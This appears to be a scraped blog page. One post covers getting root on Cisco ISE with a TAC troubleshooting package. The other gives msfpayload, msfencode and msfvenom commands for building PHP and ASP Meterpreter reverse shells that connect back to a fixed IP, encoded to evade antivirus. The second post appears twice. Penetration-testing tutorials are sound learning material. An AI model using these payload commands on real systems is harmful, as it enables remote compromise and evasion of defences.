First let me start with a disclaimer. If you do not what your doing then please stop what your doing.
Ok, so now that that is out of the way, on to the good stuff. Cisco ISE is built on top of Linux. It has a backend linux shell which is based on bash shell. It uses an oracle database. For the most part you should never need to gain access to the root shell. The only way to get root access is to get a file from Cisco TAC called TACtshootx64.tar.gz. The file name maybe slightly different based what version of ISE you are using. In my past experience I have only installed this file when Cisco TAC asked me to.
Effectively, the file gives you root access which can be obtained by executing the below.
1 Put the file in your repo.
2 Install the application using the command
application install TACtshootx64.tar.g [repo name]
3 Now to get root access;
tac root-access
You should notice that your prompt will change from
hostname/username# to [root@hostname localdisk]#
Now you are root user and can do all the functions of any other linux root user
For example ps -ef will show you what is running on the system under what user.
You can shut the ISE node down by typing shutdown -h now
If you know Oracle DB commands you can edit the databse that ISE runs on. Be very careful when modifying the DB. There are many links to many tables, and if you break it, you may just break ISE. Those tasks might be better left to senior level TAC support reps.
If your goal is simply to shutdown an ISE node, that can be done by logging into the node as admin or as a user that has the administrator role, and typing the command:
hostname/username#halt
Wednesday, March 11, 2015
Monday, March 2, 2015
Creating Shells with msfpayload, and msfvenom
msfpayload is a metasploit utility to create shell code. The shell code is used to exploit targets. These exploits can be used to create bind, and reverse shells. When coupled with msfencode, they can also be used to obsfucate the signature of the file to help avoid detection with antivirus, remove bad characters(null bytes), inject shell code into executables, and several other tasks. Below are a few examples on how to create shell code using msfpayload, as well as msfencode.
#Create a php reverse tcp meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php
#Create asp file using reverse tcp meterpreter
msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -o rmetshell443.asp
In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443.
For more information on both of these commands check out.
http://www.offensive-security.com/metasploit-unleashed/Msfencode
The makers of metsploit in all of their absolute brilliance have made this even easier in a tool called msfvenom. Msfvenom is combination of both msfpayload, and msfencode.
# This command will create a reverse shell, remove null characters \x00, and # encode the file as ASP.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00"-f asp >rmetshell443.asp
#Create a php reverse tcp meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php
#Create asp file using reverse tcp meterpreter
msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -o rmetshell443.asp
In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443.
For more information on both of these commands check out.
http://www.offensive-security.com/metasploit-unleashed/Msfencode
The makers of metsploit in all of their absolute brilliance have made this even easier in a tool called msfvenom. Msfvenom is combination of both msfpayload, and msfencode.
# This command will create a reverse shell, remove null characters \x00, and # encode the file as ASP.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00"-f asp >rmetshell443.asp
Subscribe to:
Posts (Atom)